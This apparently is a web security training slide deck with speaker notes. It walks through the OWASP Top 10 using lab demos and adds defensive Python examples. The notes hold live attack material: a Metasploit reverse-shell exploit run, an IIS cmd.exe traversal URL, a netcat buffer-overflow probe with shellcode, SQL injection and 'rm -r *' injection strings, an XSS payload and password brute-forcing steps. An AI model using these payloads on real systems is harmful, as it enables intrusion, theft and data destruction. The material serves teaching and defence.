Web Security Martin Nystrom, CISSP Security Architect

Web Security
Martin Nystrom, CISSP
Security Architect, Cisco Systems, Inc.
mnystrom@cisco.com

Who am I?
- Security Architect in Cisco's InfoSec
- Responsible for consulting with application teams to secure their architecture
- Monitor for infrastructure vulnerabilities
- Infrastructure security architect
- 12 years developing application architectures
- Java programmer
- Master of Engineering, NC State University
- Bachelor's, Iowa State University (1990)

Why worry?
- Guess.com sanctioned by FTC for exposing private information: "...permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database."
- U.S. Army systems hacked using WebDAV vulnerability in IIS: "...it was a disturbingly successful attack, experts say, because the intruder found and exploited a flaw that took security researchers completely by surprise."
- Millions of credit card numbers compromised at Data Processors International: "All indications are the attack on this company's (Internet) address came from the outside, and efforts continue to analyze this attack to see if it could be traced to the attacker," the investigator said.
- Utah ISP is victim of retaliation following hackers' attack on Al-Jazeera: "...impersonating an Al-Jazeera employee, tricked the Web addressing company Network Solutions into making technical changes that effectively turned over temporary control of the network's Arabic and English Web sites..."
- What would you do?

Notes:
- WebDAV: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
- US Army article: http://www.msnbc.com/news/886524.asp?0cv=CB10
- UTexas article: http://www.securityfocus.com/news/3174
- DPI article: http://www.computerworld.com/securitytopics/security/story/0,10801,78747,00.html "...A hacker who recently gained access to millions of credit card numbers appears to have done it by breaking into a computer system at a company that processes transactions for catalog companies and other direct marketers"
- Kevin Mitnick's site hacked: http://www.cnn.com/2003/TECH/internet/02/11/hacker.hacked.ap/ "...A hacker calling himself "BugBear" added one page to Mitnick's corporate Web site on January 30 with a message, "Welcome back to freedom, Mr. Kevin," and added that "it was fun and easy to break into your box." He included a photograph of a polar bear with two cubs."

Why worry? (cont.) Note the rate of growth in incidents.

The goal of an attack
- Steal data
- Blackmail
- Beachhead for other attacks
- Bragging rights
- Vandalism
- Demonstrate vulnerability/satisfy curiosity
- Damage company reputation
What do you need for a credit card attack to be successful? How can you program that to make it more secure?

Notes:
- Beachhead: to avoid detection, hop onto multiple servers in multiple countries to route your attack. Example: route your attack through N. Korea or China.
- Bragging rights: http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=69&database=JanT%2edb
- Vandalism: Al-Jazeera site
- Embarrass: http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=20&database=JanK%2edb

A word of warning
- These tools and techniques can be dangerous
- The difference between a hacker and a cracker is... permission
- Admins will see strange activity in logs, and come looking for you
- Authorities are prosecuting even the "good guys" for using these tools

Commonly attacked services
- SMTP servers (port 25): sendmail: "The address parser performs insufficient bounds checking in certain conditions due to a char to int conversion, making it possible for an attacker to take control of the application"
- RPC servers (port 111 & others)
- NetBIOS shares (ports 135, 139, 445): Blaster worm, Sasser worm
- FTP servers (ports 20, 21): wuftpd vulnerabilities
- SSH servers (port 22): OpenSSH, PAM vulnerabilities
- Web servers (ports 80, 443): Apache chunked encoding vulnerability

Notes:
- Sendmail: http://www.prognosisx.com/cgi-bin/cgi-script/csNews/csNews.cgi?database=JanY%2edb&command=viewone&id=62&op=t
- NetBIOS, Blaster worm: http://www2.fedcirc.gov/advisories/FA-2003-20.html
- RPC: http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=48&database=JanP%2edb
- FTP: wuftpd vulnerability http://www.cert.org/advisories/CA-2000-13.html
- SSH: OpenSSH vulnerability http://freshmeat.net/articles/view/491/. Privilege separation: "The basic idea behind privilege separation is that OpenSSH sshd(8) has something like 27000 lines of code. A lot of them run as root. However, when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privileges. This makes the daemon less vulnerable to attack."
- HTTP: Apache http://www.securiteam.com/unixfocus/5HP0G207FY.html. Exploit code: http://www.securiteam.com/exploits/5VP0L0U7FM.html

Web server attack
1. Scan to find open ports
2. Find out what's running on open ports (banner grabbing)
3. Profile the server: Windows (look for Kerberos, NetBIOS, AD) or Unix; use TCP fingerprinting
4. Probe for weaknesses on interesting ports: default configuration files and settings (e.g. popular IIS ones), buffer overflows, insecure applications
5. Launch attack: use exploit code from the Internet... or build your own

Notes:
- WebDAV exploit: http://www.securiteam.com/exploits/5SP0L159FC.html
- Compiled exploit: http://www.security.nnov.ru/search/exploits.asp

Scanning… What O/S is this system? Active Directory ports (3268, 3269) and DNS indicate that this is a Windows server, probably a domain controller.

Scanning... What O/S is this system? Show nmap scan against linuxvm; nmap makes a guess at the remote O/S. This is Linux; note port 111 open.

Example Web Application (diagram)
- Zones: Internet, DMZ, protected network, internal network
- Web client (IE, Mozilla, etc.) sends an HTTP request, clear-text or SSL, and receives an HTTP reply (HTML, JavaScript, VBScript, etc.)
- Web server: Apache, IIS, Netscape, etc.
- App server (optional), reached over AJP, IIOP, T9, etc.: J2EE server, ColdFusion, Oracle 9iAS, etc., hosting the web apps (Perl, C++ CGI, Java, ASP, PHP, etc.)
- DB transport: ADO, ODBC, JDBC, etc.
- DB: Oracle, SQL Server, etc.

OWASP Top 10 Web Application Security Vulnerabilities (http://www.owasp.org)
1. Unvalidated parameters
2. Broken access control
3. Broken account/session management
4. Cross-site scripting flaws
5. Buffer overflows
6. Command injection flaws
7. Error handling problems
8. Insecure use of cryptography
9. Remote administration flaws
10. Web and app server mis-configuration

Principles
- Turn off un-needed services
- Keep systems patched
- Don't trust input
- Watch for logic holes
- Only provide the necessary information
- Hide sensitive information
- Encryption
- Access controls

#1: Unvalidated Parameters
- Attacker can easily change any part of the HTTP request before submitting: URL, cookies, form fields, hidden fields, headers
- Encoding is not encrypting (Toasted Spam: http://www.toastedspam.com/decode64)
- Input must be validated on the server (not just the client). CoolCarts: http://www.extremelasers.com
- Countermeasures: tainting (Perl); code reviews (check variable against list of allowed values, not vice-versa); application firewalls (CodeSeeker: http://www.owasp.org/codeseeker/); real-time auditing (http://www.covelight.com)

Notes:
Input validation demo
- Edit hidden values on form
- Remember to modify action on the form too (replace /cgi-bin with http://www.coolcart.com/cgi-bin)
- Re-open in browser and click "Preview total"
- Do NOT submit order
Encoding/encrypting demo
1) Start linuxvm
2) Open Sleuth
3) Set Intercept & have it break on all responses
4) Browse to http://linuxvm:8080/manager/html
Basic auth for manager/manager in Tomcat manager app: bWFuYWdlcjptYW5hZ2Vy
Use this tool for decoding: http://www.toastedspam.com/decode64
Or use this tool: java -classpath c:\javalib\dnsjava\dnsjava-1.3.2.jar;c:\dev\Base64Decoder\classes Base64 decode <text>
Alternative to test against unvalidated parameters: http://linuxvm:8080/WebGoat/attack
- Go to "Hidden field tampering"
- Save page to disk
- Open page in TextPad; search for "price" and change the price; search for "action" and change the action to http://linuxvm:8080/WebGoat/attack
- Open page in browser and click "purchase"
Notes on Perl tainting: http://gunther.web66.com/FAQS/taintmode.html#how
#!/usr/local/bin/perl -T
The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. In Perl, the first () group match gets assigned to $1, the second () group to $2, and so on. Perl considers these new variables that arise from () groups to be untainted. Once your regular expression has created these variables, you can use them as your new untainted values.
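The two points of this slide, that the server must re-derive anything the client could have edited and that Base64 is encoding rather than encryption, as an added Python example that is not part of the deck. It applies the Perl taint-mode idea (only a regex capture group becomes a trusted value) to a hidden-field order form with a constructed catalog, and decodes the slide's Tomcat manager Basic-auth string. The catalog, field names and prices are assumptions made for the example.

```python
import base64
import binascii
import re

# Constructed server-side catalog: the authoritative price lives here, never in the form.
CATALOG = {"tshirt": 1999, "hat": 1299}  # prices in cents

# Allow-list patterns in the spirit of Perl taint mode: only the capture group of a
# successful match is treated as a trusted value; anything else stays tainted (None).
PRODUCT_RE = re.compile(r"^([a-z]{1,20})$")
QTY_RE = re.compile(r"^([1-9][0-9]{0,2})$")


def untaint(pattern, value):
    """Return the captured group if `value` matches the allow-list pattern, else None."""
    m = pattern.match(value or "")
    return m.group(1) if m else None


def validate_order(form):
    """Validate a submitted order form (a dict of strings).

    Returns (True, total_in_cents) or (False, reason). The client-supplied hidden
    'price' field is never used for the total; if present it is only compared
    against the catalog so tampering is reported instead of silently honoured.
    """
    product = untaint(PRODUCT_RE, form.get("product"))
    qty = untaint(QTY_RE, form.get("qty"))
    if product is None or qty is None:
        return False, "invalid product or quantity"
    if product not in CATALOG:
        return False, "unknown product"
    if "price" in form and form["price"] != str(CATALOG[product]):
        return False, "price mismatch (hidden field tampered)"
    return True, CATALOG[product] * int(qty)


def decode_basic_auth(header):
    """Decode an HTTP Basic Authorization header value to (user, password).

    Base64 is reversible by anyone who sees the header, which is the slide's point:
    without TLS the credentials are effectively sent in the clear.
    """
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


if __name__ == "__main__":
    print(validate_order({"product": "tshirt", "qty": "2", "price": "1"}))
    print(decode_basic_auth("Basic bWFuYWdlcjptYW5hZ2Vy"))
```

The regexes are anchored and the allow-list is positive (what is permitted), matching the slide's advice to check a variable against the list of allowed values rather than against a list of bad ones.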

#2: Broken Access Control
- Usually inconsistently defined/applied
- Examples: forced browsing past access control checks; path traversal; file permissions (may allow access to config/password files); client-side caching
- Countermeasures: use non-programmatic controls; verify access control via central container; code reviews

Notes:
- Open http://linuxvm:8080/WebGoat/attack
- Go to "Weak Authentication Cookie"
- Use Sleuth, set Intercept to stop on AuthCookie
- Log in as dave/dave
- Observe pattern for cookie encoding (encoding is backwards twice + advance one letter)
- Log in as jeff/jeff in another browser (requires session hijacking)
- Change AuthCookie to "ggfkggfk" for Jeff: AuthCookie=ggfkggfk;
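The path-traversal item above is the one access-control failure that can be checked mechanically. As an added example (not code from the deck), the following Python canonicalises a requested path under a constructed web root and rejects anything that escapes it, and it also rejects double percent-encoded input, the trick the IIS example later in the deck relies on. The root directory is an assumption.

```python
import os
from urllib.parse import unquote

# Constructed document root for the example.
WEB_ROOT = "/var/www/html"


def decode_once(path):
    """Percent-decode exactly once and refuse input that is still encoded afterwards.

    Decoding a second time and getting a different string means the client sent
    double-encoded data (for example ..%252f), which is the classic way to slip
    past a filter that decodes after it checks.
    """
    decoded = unquote(path)
    if unquote(decoded) != decoded:
        return None
    return decoded


def resolve_under_root(root, requested):
    """Return the absolute path for `requested` if it stays inside `root`, else None.

    Canonicalise first so '..' and '.' segments are collapsed, then compare against
    the root with a trailing separator so a sibling directory such as
    /var/www/html2 does not pass the prefix test.
    """
    root = os.path.abspath(root)
    # A leading slash would make os.path.join discard the root, so strip it.
    candidate = os.path.abspath(os.path.join(root, requested.lstrip("/")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def serve_path(raw_request_path):
    """Full check a request handler would run: decode once, then confine to the root."""
    decoded = decode_once(raw_request_path)
    if decoded is None:
        return None
    return resolve_under_root(WEB_ROOT, decoded)


if __name__ == "__main__":
    for p in ["index.html", "css/../index.html", "../../etc/passwd", "..%2f..%2fetc%2fpasswd", "..%252f.."]:
        print(p, "->", serve_path(p))
```

The check belongs in one central place (the container or a single request filter), which is the slide's "verify access control via central container": a per-page check is exactly the kind that ends up inconsistently applied.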

#3: Broken Account and Session Management
- Weak authentication: password-only; easily guessable usernames (admin, etc.); unencrypted secrets are sniffable
- How to break in: guess/reset password; have app email you new password; sniff or crack password
- Backend authentication: how are database passwords stored? Trust relationships between hosts (IP address can be spoofed, etc.)
- Countermeasures: strong passwords; remove default user names; protect sensitive files

Notes:
- Use Brutus to guess manager password, show how it could be used to break into admin account. Target: linuxvm/manager/html; Port: 8080; Type: HTTP (Basic Auth); Method: HEAD; Use Username checked, Single User checked, Userid=manager. BREAK IN.
- Show sniffer in win2kvm
- Brute force crackers: http://packetstormsecurity.nl/Crackers/
- Show passwords, database stuff at: http://linuxvm:8080/pg/config/

#4: Cross-Site Scripting (XSS)
- Attacker uses trusted application/company to reflect malicious code to end-user
- Attacker can "hide" the malicious code: Unicode encoding
- 2 types of attacks: stored, reflected
- Wide-spread problem!
- Countermeasures: input validation, positive or negative ("< > ( ) # &"; don't forget these: "&lt &gt &#40 &#41 &#35 &#38"); user/customer education

Notes:
- Stored example: http://linuxvm:8080/WebGoat/attack. Go to Database XSS example, and store the following in the message field: <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
- For reflected attack, add the above line to http://www.cisco.com
- Example of what this can do: http://eyeonsecurity.org/papers/passport.htm
- CitiBank phishing scam: http://www.securityfocus.com/infocus/1745
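The slide lists six characters and the entities they should become. As an added Python example (not from the deck), the following encodes output using exactly that mapping, shows the negative check the slide describes, and runs both over the deck's own alert() payload. It also adds an attribute-context encoder, because the slide's list omits quotes, which matter when untrusted text lands inside an HTML attribute; that addition is the example's own, not the slide's.

```python
import html

# The slide's negative-validation characters and the entities it says not to forget.
ENTITY_MAP = {
    "&": "&#38;",
    "<": "&lt;",
    ">": "&gt;",
    "(": "&#40;",
    ")": "&#41;",
    "#": "&#35;",
}

# The deck's stored-XSS demo payload, reused here as test input.
PAYLOAD = '<script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>'


def encode_for_html(text):
    """Output-encode untrusted text for an HTML body using the slide's entity list.

    Encoding is done character by character, so '&' is never re-encoded after
    another entity has been emitted.
    """
    return "".join(ENTITY_MAP.get(ch, ch) for ch in text)


def encode_for_attribute(text):
    """Attribute context additionally needs quotes encoded (not in the slide's list)."""
    return html.escape(text, quote=True)


def contains_blocked_chars(text):
    """The slide's negative input check: True if any listed character is present."""
    return any(ch in text for ch in ENTITY_MAP)


def render_message(untrusted):
    """Render a stored guestbook message the way a safe page would: encode on output."""
    return '<p class="message">' + encode_for_html(untrusted) + "</p>"


if __name__ == "__main__":
    print(contains_blocked_chars(PAYLOAD))
    print(render_message(PAYLOAD))
```

Output encoding is what actually stops the stored variant: the string is kept as the user typed it, and is rendered inert every time it is displayed, whereas the negative input check on its own only rejects the six characters it knows about.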

#5: Buffer Overflows
- Mostly affects web/app servers; can affect apps/libraries too
- Goal: crash the target app and get a shell
- Buffer overflow example: echo "vrfy `perl -e 'print "a" x 1000'`" | nc www.targetsystem.com 25
- Replace all those "a"s with something like this: char shellcode[] = "\xeb\xlf\x5e\x89\x76\x08..."
- Countermeasures: keep up with bug reports/patches; code reviews; run with limited privileges; use "safer" languages like Java

Notes:
- C:\eviltools\overflow-example\Smasher.html. Enter DDDDDDDDDDD (11 D's). You can look up the ASCII function call with http://www.asciitable.com/
- Example against IIS: http://win2kvm/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
- Java security (quoted from a Slashdot comment "Re:Speed issues aside" by quantum bit): No buffer overflows. Without throwing an exception and crashing the program. No dereferencing of null pointers. Without crashing the program (java.lang.NullPointerException). No object creation failures (all "new"s succeed). Automatic bounds checking. Exception handling.
- Buffer overflow attack against win2kvm: make sure web server is running on win2kvm (Start/Programs/Administrative Tools/Internet Services Manager); launch Metasploit Framework; setg RHOST win2kvm; setg LHOST 192.168.149.1; setg PAYLOAD winreverse; use exploit iis50_nsiislog_post; check; show targets; set TARGET 0; setg LPORT 52000; exploit

#6: Command Injection
- Allows attacker to relay malicious code in form variables or URL: system commands, SQL, interpreted code (Perl, Python, etc.)
- Many apps use calls to external programs: sendmail
- Examples: path traversal: "../"; add more commands: "; rm -r *"; SQL injection: "' OR 1=1"
- Countermeasures: taint all input; avoid system calls (use libraries instead); run with limited privileges

Notes:
SQL injection example:
- Go to http://win2kvm/AcmeHackme
- Generate error by putting a quote at the end of the user name and a simple password.
- Try username = ' or username like 's%' and note that the password is wrong
- Try ' or username like 's%' or '-- for username with password = anything
- You are now logged in as sam speed
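The AcmeHackme walkthrough above, as an added Python example that is not part of the deck: an in-memory SQLite table with one constructed account ("sam speed", matching the slide's result), a login written with string concatenation so the slide's three inputs behave as described, and the same query with bound parameters, which is the "use libraries instead" countermeasure for SQL. The table layout and the password are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table with one account for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, fullname TEXT)")
    conn.execute("INSERT INTO users VALUES ('sam', 's3cret', 'sam speed')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL text itself.

    A lone quote breaks the statement (the slide's first step); the slide's
    ' or username like 's%' or '-- input turns the WHERE clause into a
    tautology and comments out the password check.
    """
    sql = ("SELECT fullname FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Bound parameters: the input is passed as data, so quotes and '--' have no SQL meaning."""
    row = conn.execute(
        "SELECT fullname FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def quote_causes_error(conn):
    """The slide's first step: a trailing quote in the username breaks the concatenated SQL."""
    try:
        login_vulnerable(conn, "sam'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    injected = "' or username like 's%' or '--"
    print("concatenated:", login_vulnerable(db, injected, "anything"))
    print("parameterized:", login_parameterized(db, injected, "anything"))
```

The error in the first step is the information leak from slide #7: a raw database error tells the attacker the quote reached the SQL engine. With parameters the same input is simply a username that does not exist, and no error is produced.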

#7: Error Handling
- Examples: stack traces, DB dumps
- Helps attacker know how to target the app
- Inconsistencies can be revealing too: "File not found" vs. "Access denied"
- Fail-open errors
- Need to give enough info to user w/o giving too much info to attacker
- Countermeasures: code review; modify default error pages (404, 401, etc.)

Notes:
- Fail-open auth example is http://linuxvm:8080/WebGoat/attack. Won't work with passwords, but if you try it _without_ a password, it lets you in. Show sample code.
- Show 401 error message on https://www.cybergrants.com after logging in; it shows "plsql" in the path.

Error messages example

#8: Poor Cryptography
- Insecure storage of credit cards, passwords, etc.
- Poor choice of algorithm (or invent your own)
- Poor randomness: session IDs, tokens, cookies
- Improper storage in memory
- Countermeasures: store only what you must; store a hash instead of the full value (SHA-1); use only vetted, public cryptography

Notes:
- Demonstrate md5 tool on Windows XP laptop with: md5 -dhello and md5 -djello
- Demonstrate encryption with PGP: pgp -e /home/mnystrom/example.txt mnystrom (produces example.txt.pgp); pgp /home/mnystrom/example.txt.pgp
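One added Python example (not from the deck) covering three slides at once: the password-storage question from #3, the fail-open and "inconsistent message" problems from #7, and the hash-instead-of-value and session-ID randomness points from #8. It stores only a salted hash, fails closed when the password is missing (the WebGoat fail-open case), returns one generic message whether the user is unknown or the password is wrong, and issues session IDs from the OS random source rather than from a reversible encoding of the username. The slide names SHA-1; this example uses PBKDF2-HMAC-SHA256, a current salted, iterated construction, and that substitution is the example's own. The user store and usernames are constructed.

```python
import hashlib
import hmac
import os
import secrets

# Constructed user store: username -> (salt, pbkdf2 digest). Passwords are never kept.
USERS = {}

GENERIC_FAILURE = "invalid username or password"


def hash_password(password, salt=None, iterations=200_000):
    """Salted, iterated hash of a password. Returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


def register(username, password):
    """Store only the hash; the value on disk is useless to someone who reads the table."""
    USERS[username] = hash_password(password)


def new_session_id():
    """Session identifiers come from the CSPRNG, so they cannot be derived or predicted."""
    return secrets.token_urlsafe(32)


def login(username, password):
    """Return (session_id, None) on success, (None, GENERIC_FAILURE) on any failure.

    Fails closed: a missing password is a failure, not a bypass. Unknown users and
    wrong passwords get the same message, and a dummy hash is computed for unknown
    users so the two cases take about the same time.
    """
    if not username or not password:
        return None, GENERIC_FAILURE
    record = USERS.get(username)
    salt, stored = record if record else (b"\x00" * 16, b"\x00" * 32)
    _, candidate = hash_password(password, salt)
    if record is None or not hmac.compare_digest(candidate, stored):
        return None, GENERIC_FAILURE
    return new_session_id(), None


if __name__ == "__main__":
    register("alice", "correct horse")
    print(login("alice", "correct horse"))
    print(login("alice", ""))
    print(login("nobody", "x"))
```

Compare this with the WebGoat AuthCookie from slide #2, whose value is a reversible transform of the username: anyone who learns the rule can mint a cookie for any user, which a 32-byte random token does not allow.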

#9: Remote Administration Flaws
- Problems: weak authentication (username="admin"); weak encryption
- Countermeasures: don't place admin interface on same server; use strong authentication: certificates, tokens, strong passwords, etc.; encrypt entire session (VPN or SSL); control who has accounts; IP restrictions

Notes:
- Example: http://linuxvm:8080/soap/admin/index.html
- Example ColdFusion: http://win2kvm:8500/CFIDE/administrator/index.cfm

#10: Web/App Server Misconfiguration
- Tension between "work out of the box" and "use only what you need"
- Developers ≠ web masters
- Examples: unpatched security flaws (BID example); misconfigurations that allow directory traversal; administrative services accessible; default accounts/passwords
- Countermeasures: create and use hardening guides; turn off all unused services; set up and audit roles, permissions, and accounts; set up logging and alerts

Notes:
- Oracle 9iAS examples: http://www.nextgenss.com
- IIS hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Technical Reference NT IIS 5_0 and Win2K Hardening Configuration.htm
- Apache hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Apache hardening guide.doc
- Examples: show how an administrator might want to change admin web site properties for the Admin web server; select "Directory Security/IP address and domain name restrictions/Edit..." at http://win2kvm:4626/iis.asp

Principles
- Turn off un-needed services
- Keep systems patched
- Don't trust input
- Watch for logic holes
- Only provide the necessary information
- Hide sensitive information
- Encryption
- Access controls

Tools used in this preso
- WebGoat: vulnerable web applications for demonstration
- VMWare: runs Linux & Windows 2000 virtual machines on demo laptop
- nmap: host/port scanning to find vulnerable hosts
- Ethereal: network traffic sniffing
- Metasploit Framework: exploit tool
- Brutus: password cracking
- Sleuth: HTTP mangling against web sites